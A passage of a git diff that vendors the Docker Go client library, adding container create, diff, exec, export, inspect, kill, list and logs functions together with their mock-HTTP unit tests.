+			return response, imageNotFoundError{config.Image}
+		}
+		return response, err
+	}
+
+	err = json.NewDecoder(serverResp.body).Decode(&response)
+	ensureReaderClosed(serverResp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_create_test.go b/vendor/github.com/docker/docker/client/container_create_test.go
new file mode 100644
index 0000000000..15dbd5ea01
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_create_test.go
@@ -0,0 +1,76 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	"golang.org/x/net/context"
+)
+
+func TestContainerCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerCreate(context.Background(), nil, nil, nil, "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error while testing StatusInternalServerError, got %v", err)
+	}
+
+	// 404 doesn't automagitally means an unknown image
+	client = &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+	_, err = client.ContainerCreate(context.Background(), nil, nil, nil, "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error while testing StatusNotFound, got %v", err)
+	}
+}
+
+func TestContainerCreateImageNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "No such image")),
+	}
+	_, err := client.ContainerCreate(context.Background(), &container.Config{Image: "unknown_image"}, nil, nil, "unknown")
+	if err == nil || !IsErrImageNotFound(err) {
+		t.Fatalf("expected an imageNotFound error, got %v", err)
+	}
+}
+
+func TestContainerCreateWithName(t *testing.T) {
+	expectedURL := "/containers/create"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			name := req.URL.Query().Get("name")
+			if name != "container_name" {
+				return nil, fmt.Errorf("container name not set in URL query properly. Expected `container_name`, got %s", name)
+			}
+			b, err := json.Marshal(container.ContainerCreateCreatedBody{
+				ID: "container_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	r, err := client.ContainerCreate(context.Background(), nil, nil, nil, "container_name")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "container_id" {
+		t.Fatalf("expected `container_id`, got %s", r.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_diff.go b/vendor/github.com/docker/docker/client/container_diff.go
new file mode 100644
index 0000000000..1e3e554fc5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_diff.go
@@ -0,0 +1,23 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerDiff shows differences in a container filesystem since it was started.
+func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]types.ContainerChange, error) {
+	var changes []types.ContainerChange
+
+	serverResp, err := cli.get(ctx, "/containers/"+containerID+"/changes", url.Values{}, nil)
+	if err != nil {
+		return changes, err
+	}
+
+	err = json.NewDecoder(serverResp.body).Decode(&changes)
+	ensureReaderClosed(serverResp)
+	return changes, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_diff_test.go b/vendor/github.com/docker/docker/client/container_diff_test.go
new file mode 100644
index 0000000000..1ce1117684
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_diff_test.go
@@ -0,0 +1,61 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestContainerDiffError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerDiff(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+
+}
+
+func TestContainerDiff(t *testing.T) {
+	expectedURL := "/containers/container_id/changes"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			b, err := json.Marshal([]types.ContainerChange{
+				{
+					Kind: 0,
+					Path: "/path/1",
+				},
+				{
+					Kind: 1,
+					Path: "/path/2",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	changes, err := client.ContainerDiff(context.Background(), "container_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(changes) != 2 {
+		t.Fatalf("expected an array of 2 changes, got %v", changes)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_exec.go b/vendor/github.com/docker/docker/client/container_exec.go
new file mode 100644
index 0000000000..0665c54fbd
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_exec.go
@@ -0,0 +1,54 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerExecCreate creates a new exec configuration to run an exec process.
+func (cli *Client) ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) {
+	var response types.IDResponse
+
+	if err := cli.NewVersionError("1.25", "env"); len(config.Env) != 0 && err != nil {
+		return response, err
+	}
+
+	resp, err := cli.post(ctx, "/containers/"+container+"/exec", nil, config, nil)
+	if err != nil {
+		return response, err
+	}
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
+
+// ContainerExecStart starts an exec process already created in the docker host.
+func (cli *Client) ContainerExecStart(ctx context.Context, execID string, config types.ExecStartCheck) error {
+	resp, err := cli.post(ctx, "/exec/"+execID+"/start", nil, config, nil)
+	ensureReaderClosed(resp)
+	return err
+}
+
+// ContainerExecAttach attaches a connection to an exec process in the server.
+// It returns a types.HijackedConnection with the hijacked connection
+// and the a reader to get output. It's up to the called to close
+// the hijacked connection by calling types.HijackedResponse.Close.
+func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) {
+	headers := map[string][]string{"Content-Type": {"application/json"}}
+	return cli.postHijacked(ctx, "/exec/"+execID+"/start", nil, config, headers)
+}
+
+// ContainerExecInspect returns information about a specific exec process on the docker host.
+func (cli *Client) ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error) {
+	var response types.ContainerExecInspect
+	resp, err := cli.get(ctx, "/exec/"+execID+"/json", nil, nil)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_exec_test.go b/vendor/github.com/docker/docker/client/container_exec_test.go
new file mode 100644
index 0000000000..0e296a50ad
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_exec_test.go
@@ -0,0 +1,157 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestContainerExecCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerExecCreate(context.Background(), "container_id", types.ExecConfig{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerExecCreate(t *testing.T) {
+	expectedURL := "/containers/container_id/exec"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			// FIXME validate the content is the given ExecConfig ?
+			if err := req.ParseForm(); err != nil {
+				return nil, err
+			}
+			execConfig := &types.ExecConfig{}
+			if err := json.NewDecoder(req.Body).Decode(execConfig); err != nil {
+				return nil, err
+			}
+			if execConfig.User != "user" {
+				return nil, fmt.Errorf("expected an execConfig with User == 'user', got %v", execConfig)
+			}
+			b, err := json.Marshal(types.IDResponse{
+				ID: "exec_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	r, err := client.ContainerExecCreate(context.Background(), "container_id", types.ExecConfig{
+		User: "user",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "exec_id" {
+		t.Fatalf("expected `exec_id`, got %s", r.ID)
+	}
+}
+
+func TestContainerExecStartError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerExecStart(context.Background(), "nothing", types.ExecStartCheck{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerExecStart(t *testing.T) {
+	expectedURL := "/exec/exec_id/start"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if err := req.ParseForm(); err != nil {
+				return nil, err
+			}
+			execStartCheck := &types.ExecStartCheck{}
+			if err := json.NewDecoder(req.Body).Decode(execStartCheck); err != nil {
+				return nil, err
+			}
+			if execStartCheck.Tty || !execStartCheck.Detach {
+				return nil, fmt.Errorf("expected execStartCheck{Detach:true,Tty:false}, got %v", execStartCheck)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.ContainerExecStart(context.Background(), "exec_id", types.ExecStartCheck{
+		Detach: true,
+		Tty:    false,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestContainerExecInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerExecInspect(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerExecInspect(t *testing.T) {
+	expectedURL := "/exec/exec_id/json"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			b, err := json.Marshal(types.ContainerExecInspect{
+				ExecID:      "exec_id",
+				ContainerID: "container_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	inspect, err := client.ContainerExecInspect(context.Background(), "exec_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if inspect.ExecID != "exec_id" {
+		t.Fatalf("expected ExecID to be `exec_id`, got %s", inspect.ExecID)
+	}
+	if inspect.ContainerID != "container_id" {
+		t.Fatalf("expected ContainerID `container_id`, got %s", inspect.ContainerID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_export.go b/vendor/github.com/docker/docker/client/container_export.go
new file mode 100644
index 0000000000..52194f3d34
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_export.go
@@ -0,0 +1,20 @@
+package client
+
+import (
+	"io"
+	"net/url"
+
+	"golang.org/x/net/context"
+)
+
+// ContainerExport retrieves the raw contents of a container
+// and returns them as an io.ReadCloser. It's up to the caller
+// to close the stream.
+func (cli *Client) ContainerExport(ctx context.Context, containerID string) (io.ReadCloser, error) {
+	serverResp, err := cli.get(ctx, "/containers/"+containerID+"/export", url.Values{}, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	return serverResp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/container_export_test.go b/vendor/github.com/docker/docker/client/container_export_test.go
new file mode 100644
index 0000000000..5849fe9252
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_export_test.go
@@ -0,0 +1,50 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerExportError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerExport(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerExport(t *testing.T) {
+	expectedURL := "/containers/container_id/export"
+	client := &Client{
+		client: newMockClient(func(r *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(r.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("response"))),
+			}, nil
+		}),
+	}
+	body, err := client.ContainerExport(context.Background(), "container_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer body.Close()
+	content, err := ioutil.ReadAll(body)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(content) != "response" {
+		t.Fatalf("expected response to contain 'response', got %s", string(content))
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_inspect.go b/vendor/github.com/docker/docker/client/container_inspect.go
new file mode 100644
index 0000000000..17f1809747
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_inspect.go
@@ -0,0 +1,54 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ContainerInspect returns the container information.
+func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (types.ContainerJSON, error) {
+	serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", nil, nil)
+	if err != nil {
+		if serverResp.statusCode == http.StatusNotFound {
+			return types.ContainerJSON{}, containerNotFoundError{containerID}
+		}
+		return types.ContainerJSON{}, err
+	}
+
+	var response types.ContainerJSON
+	err = json.NewDecoder(serverResp.body).Decode(&response)
+	ensureReaderClosed(serverResp)
+	return response, err
+}
+
+// ContainerInspectWithRaw returns the container information and its raw representation.
+func (cli *Client) ContainerInspectWithRaw(ctx context.Context, containerID string, getSize bool) (types.ContainerJSON, []byte, error) {
+	query := url.Values{}
+	if getSize {
+		query.Set("size", "1")
+	}
+	serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", query, nil)
+	if err != nil {
+		if serverResp.statusCode == http.StatusNotFound {
+			return types.ContainerJSON{}, nil, containerNotFoundError{containerID}
+		}
+		return types.ContainerJSON{}, nil, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	body, err := ioutil.ReadAll(serverResp.body)
+	if err != nil {
+		return types.ContainerJSON{}, nil, err
+	}
+
+	var response types.ContainerJSON
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&response)
+	return response, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_inspect_test.go b/vendor/github.com/docker/docker/client/container_inspect_test.go
new file mode 100644
index 0000000000..f1a6f4ac7d
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_inspect_test.go
@@ -0,0 +1,125 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestContainerInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.ContainerInspect(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerInspectContainerNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, err := client.ContainerInspect(context.Background(), "unknown")
+	if err == nil || !IsErrContainerNotFound(err) {
+		t.Fatalf("expected a containerNotFound error, got %v", err)
+	}
+}
+
+func TestContainerInspect(t *testing.T) {
+	expectedURL := "/containers/container_id/json"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(types.ContainerJSON{
+				ContainerJSONBase: &types.ContainerJSONBase{
+					ID:    "container_id",
+					Image: "image",
+					Name:  "name",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	r, err := client.ContainerInspect(context.Background(), "container_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "container_id" {
+		t.Fatalf("expected `container_id`, got %s", r.ID)
+	}
+	if r.Image != "image" {
+		t.Fatalf("expected `image`, got %s", r.ID)
+	}
+	if r.Name != "name" {
+		t.Fatalf("expected `name`, got %s", r.ID)
+	}
+}
+
+func TestContainerInspectNode(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			content, err := json.Marshal(types.ContainerJSON{
+				ContainerJSONBase: &types.ContainerJSONBase{
+					ID:    "container_id",
+					Image: "image",
+					Name:  "name",
+					Node: &types.ContainerNode{
+						ID:     "container_node_id",
+						Addr:   "container_node",
+						Labels: map[string]string{"foo": "bar"},
+					},
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	r, err := client.ContainerInspect(context.Background(), "container_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "container_id" {
+		t.Fatalf("expected `container_id`, got %s", r.ID)
+	}
+	if r.Image != "image" {
+		t.Fatalf("expected `image`, got %s", r.ID)
+	}
+	if r.Name != "name" {
+		t.Fatalf("expected `name`, got %s", r.ID)
+	}
+	if r.Node.ID != "container_node_id" {
+		t.Fatalf("expected `container_node_id`, got %s", r.Node.ID)
+	}
+	if r.Node.Addr != "container_node" {
+		t.Fatalf("expected `container_node`, got %s", r.Node.Addr)
+	}
+	foo, ok := r.Node.Labels["foo"]
+	if foo != "bar" || !ok {
+		t.Fatalf("expected `bar` for label `foo`")
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_kill.go b/vendor/github.com/docker/docker/client/container_kill.go
new file mode 100644
index 0000000000..29f80c73ad
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_kill.go
@@ -0,0 +1,17 @@
+package client
+
+import (
+	"net/url"
+
+	"golang.org/x/net/context"
+)
+
+// ContainerKill terminates the container process but does not remove the container from the docker host.
+func (cli *Client) ContainerKill(ctx context.Context, containerID, signal string) error {
+	query := url.Values{}
+	query.Set("signal", signal)
+
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/kill", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/container_kill_test.go b/vendor/github.com/docker/docker/client/container_kill_test.go
new file mode 100644
index 0000000000..9477b0abd2
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_kill_test.go
@@ -0,0 +1,46 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerKillError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.ContainerKill(context.Background(), "nothing", "SIGKILL")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerKill(t *testing.T) {
+	expectedURL := "/containers/container_id/kill"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			signal := req.URL.Query().Get("signal")
+			if signal != "SIGKILL" {
+				return nil, fmt.Errorf("signal not set in URL query properly. Expected 'SIGKILL', got %s", signal)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.ContainerKill(context.Background(), "container_id", "SIGKILL")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_list.go b/vendor/github.com/docker/docker/client/container_list.go
new file mode 100644
index 0000000000..4398912197
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_list.go
@@ -0,0 +1,56 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+// ContainerList returns the list of containers in the docker host.
+func (cli *Client) ContainerList(ctx context.Context, options types.ContainerListOptions) ([]types.Container, error) {
+	query := url.Values{}
+
+	if options.All {
+		query.Set("all", "1")
+	}
+
+	if options.Limit != -1 {
+		query.Set("limit", strconv.Itoa(options.Limit))
+	}
+
+	if options.Since != "" {
+		query.Set("since", options.Since)
+	}
+
+	if options.Before != "" {
+		query.Set("before", options.Before)
+	}
+
+	if options.Size {
+		query.Set("size", "1")
+	}
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParamWithVersion(cli.version, options.Filters)
+
+		if err != nil {
+			return nil, err
+		}
+
+		query.Set("filters", filterJSON)
+	}
+
+	resp, err := cli.get(ctx, "/containers/json", query, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	var containers []types.Container
+	err = json.NewDecoder(resp.body).Decode(&containers)
+	ensureReaderClosed(resp)
+	return containers, err
+}
diff --git a/vendor/github.com/docker/docker/client/container_list_test.go b/vendor/github.com/docker/docker/client/container_list_test.go
new file mode 100644
index 0000000000..e41c6874b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_list_test.go
@@ -0,0 +1,96 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+func TestContainerListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerList(context.Background(), types.ContainerListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestContainerList(t *testing.T) {
+	expectedURL := "/containers/json"
+	expectedFilters := `{"before":{"container":true},"label":{"label1":true,"label2":true}}`
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			query := req.URL.Query()
+			all := query.Get("all")
+			if all != "1" {
+				return nil, fmt.Errorf("all not set in URL query properly. Expected '1', got %s", all)
+			}
+			limit := query.Get("limit")
+			if limit != "0" {
+				return nil, fmt.Errorf("limit should have not be present in query. Expected '0', got %s", limit)
+			}
+			since := query.Get("since")
+			if since != "container" {
+				return nil, fmt.Errorf("since not set in URL query properly. Expected 'container', got %s", since)
+			}
+			before := query.Get("before")
+			if before != "" {
+				return nil, fmt.Errorf("before should have not be present in query, go %s", before)
+			}
+			size := query.Get("size")
+			if size != "1" {
+				return nil, fmt.Errorf("size not set in URL query properly. Expected '1', got %s", size)
+			}
+			filters := query.Get("filters")
+			if filters != expectedFilters {
+				return nil, fmt.Errorf("expected filters incoherent '%v' with actual filters %v", expectedFilters, filters)
+			}
+
+			b, err := json.Marshal([]types.Container{
+				{
+					ID: "container_id1",
+				},
+				{
+					ID: "container_id2",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	filters := filters.NewArgs()
+	filters.Add("label", "label1")
+	filters.Add("label", "label2")
+	filters.Add("before", "container")
+	containers, err := client.ContainerList(context.Background(), types.ContainerListOptions{
+		Size:    true,
+		All:     true,
+		Since:   "container",
+		Filters: filters,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(containers) != 2 {
+		t.Fatalf("expected 2 containers, got %v", containers)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_logs.go b/vendor/github.com/docker/docker/client/container_logs.go
new file mode 100644
index 0000000000..69056b6321
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_logs.go
@@ -0,0 +1,52 @@
+package client
+
+import (
+	"io"
+	"net/url"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	timetypes "github.com/docker/docker/api/types/time"
+)
+
+// ContainerLogs returns the logs generated by a container in an io.ReadCloser.
+// It's up to the caller to close the stream.
+func (cli *Client) ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error) {
+	query := url.Values{}
+	if options.ShowStdout {
+		query.Set("stdout", "1")
+	}
+
+	if options.ShowStderr {
+		query.Set("stderr", "1")
+	}
+
+	if options.Since != "" {
+		ts, err := timetypes.GetTimestamp(options.Since, time.Now())
+		if err != nil {
+			return nil, err
+		}
+		query.Set("since", ts)
+	}
+
+	if options.Timestamps {
+		query.Set("timestamps", "1")
+	}
+
+	if options.Details {
+		query.Set("details", "1")
+	}
+
+	if options.Follow {
+		query.Set("follow", "1")
+	}
+	query.Set("tail", options.Tail)
+
+	resp, err := cli.get(ctx, "/containers/"+container+"/logs", query, nil)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/container_logs_test.go b/vendor/github.com/docker/docker/client/container_logs_test.go
new file mode 100644
index 0000000000..99e31842c9
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_logs_test.go
@@ -0,0 +1,133 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"log"
+	"net/http"
+	"os"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerLogsError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+	_, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{
+		Since: "2006-01-02TZ",
+	})
+	if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) {
+		t.Fatalf("expected a 'parsing time' error, got %v", err)
+	}
+}
+
+func TestContainerLogs(t *testing.T) {
+	expectedURL := "/containers/container_id/logs"
+	cases := []struct {
+		options             types.ContainerLogsOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			expectedQueryParams: map[string]string{
+				"tail": "",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				Tail: "any",
+			},
+			expectedQueryParams: map[string]string{
+				"tail": "any",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				ShowStdout: true,
+				ShowStderr: true,
+				Timestamps: true,
+				Details:    true,
+				Follow:     true,
+			},
+			expectedQueryParams: map[string]string{
+				"tail":       "",
+				"stdout":     "1",
+				"stderr":     "1",
+				"timestamps": "1",
+				"details":    "1",
+				"follow":     "1",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				// An complete invalid date, timestamp or go duration will be
+				// passed as is
+				Since: "invalid but valid",
+			},
+			expectedQueryParams: map[string]string{
+				"tail":  "",
+				"since": "invalid but valid",
+			},
+		},
+	}
+	for _, logCase := range cases {
+		client := &Client{
+			client: newMockClient(func(r *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(r.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+				}
+				// Check query parameters
+				query := r.URL.Query()
+				for key, expected := range logCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
